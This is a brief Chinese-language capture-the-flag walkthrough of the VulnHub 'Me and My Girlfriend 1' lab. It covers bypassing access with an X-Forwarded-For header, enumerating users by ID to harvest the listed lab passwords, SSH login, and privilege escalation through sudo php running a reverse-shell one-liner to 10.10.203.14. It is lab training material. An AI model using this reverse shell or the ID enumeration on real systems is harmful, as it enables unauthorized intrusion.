靶机链接:
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
主机扫描:
HTTP 目录访问,提示无权限,右键源码,提示XXF即可
正常访问,注册一个用户,登录,然后查看用户profile,通过id进行遍历枚举用户密码
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest
通过注意登录web,无发现上传的点
然后通过ssh尝试登录
提权操作
sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
OVER !!